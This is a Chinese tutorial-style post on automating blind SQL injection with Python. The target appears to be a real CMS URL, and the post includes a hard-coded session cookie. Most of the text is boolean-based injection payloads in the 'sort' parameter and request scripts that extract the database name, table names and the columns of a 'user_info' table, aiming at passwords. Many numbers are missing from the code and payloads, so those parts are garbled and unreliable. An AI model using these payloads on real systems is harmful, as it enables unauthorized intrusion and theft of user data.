python辅助sql手工注入猜解数据库案例分析-LMLPHP

发现存在sql注入漏洞

简单一点可以直接用sqlmap工具暴库

但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库

首先hachbar开启

python辅助sql手工注入猜解数据库案例分析-LMLPHP

获取cms登录后的sessionid值

python辅助sql手工注入猜解数据库案例分析-LMLPHP

开始构造sql payload

获取数据库名的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

python辅助sql手工注入猜解数据库案例分析-LMLPHP

python辅助sql手工注入猜解数据库案例分析-LMLPHP

手工猜解需要从1往后遍历,当为8时,猜解成功

python辅助sql手工注入猜解数据库案例分析-LMLPHP

做sql手工注入的,主要是这个猜解的过程比较麻烦,大量的重复工作,所以需要做成python自动化

实现脚本如下:

# -*- encoding:utf- -*-
#user()
#database()
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} string = ''
for i in range(,):
url='http://yucms.hhlyty.cn/finance/account/accountList'
body = {'page': '','rows': '','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print length if length == :
print ("数据库长度为:%d" %i)
print(rs.text)
#string += j
# break
# print string
#print(rs.text)

python辅助sql手工注入猜解数据库案例分析-LMLPHP

猜解数据库完整的名字

payload

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

substr(database(),1,1 ,第一个1,表示字符串的第几位,第二个1,表示截取一位,这样,就可以逐字符猜解

# -*- encoding:utf- -*-
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} #dic1='3_abcdefghijklmnopqrstuvwxyz'
dic="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\|[{?>=<;:/.-,+*)('&%$#@!" print len(dic) string = ''
for i in range(,):
# leng = len(string)
# if leng == :
for j in dic:
#leng = len(string)
#if leng == 8:
#m=str(ord(j))
#print (m)
m=j
url='http://yucms.hhlyty.cn/finance/account/accountList'
body = {'page': '','rows': '','order': 'desc','sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format((i),ord(m))}
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print (j)
print (body)
#print length
if length == :
print ("数据库第%d个字符是:%s:" % (i, j))
m = str(ord(j))
string += j
i=i+
print (m)
print (i)
# n=','
# m += n
# print (m)
break
print ("数据库是:%s" % string) #break print (i)
# print ("数据库第%d个字符是:%s:" % (i,j))
# print ("数据库是:%s" % string) # if length == :
# print ("数据库长度为:%d" %i)
# print(rs.text)
#string += j
# break
# print string #print(rs.text)

python辅助sql手工注入猜解数据库案例分析-LMLPHP

猜解表名:

1.猜解第204张表名的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)
)&order=desc

python辅助sql手工注入猜解数据库案例分析-LMLPHP

# -*- encoding:utf- -*-
#user()
#database()
import requests
cookies={
'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
} string = ''
for i in range(,):
url='http://yucms.hhlyty.cn/finance/account/accountList'
#body = {'page': '','rows': '','order': 'desc','sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库名长度
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} #获取数据库中表的个数
#body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
# body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中表的个数
body = {'page': '', 'rows': '', 'order': 'desc','sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)} # 获取数据库中第204张表名的长度
rs = requests.request("POST", url, cookies=cookies, params=body)
content=rs.content
length = len(content)
#print length if length == :
print ("数据库长度为:%d" %i)
print(rs.text)
#string += j
# break
# print string
#print(rs.text)

python辅助sql手工注入猜解数据库案例分析-LMLPHP

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,,1) from information_schema.tables where table_schema=database() limit ,1)))=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

1表示表名的第一个字符

204表示数据库中的第204张表

117表示第一个字符的ascii编码

python辅助sql手工注入猜解数据库案例分析-LMLPHP

python辅助sql手工注入猜解数据库案例分析-LMLPHP

猜解列名:

1.首先猜测表中字段的个数

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

python辅助sql手工注入猜解数据库案例分析-LMLPHP

python辅助sql手工注入猜解数据库案例分析-LMLPHP

2.逐个字段猜解:

猜解密码字段:

猜解第204张表user_info表第一个字段的长度:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解第一个列名的长度:

python辅助sql手工注入猜解数据库案例分析-LMLPHP

python辅助sql手工注入猜解数据库案例分析-LMLPHP

python辅助sql手工注入猜解数据库案例分析-LMLPHP

猜解字段名字:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

猜解字段名的第一个字符为85

python辅助sql手工注入猜解数据库案例分析-LMLPHP

04-28 13:41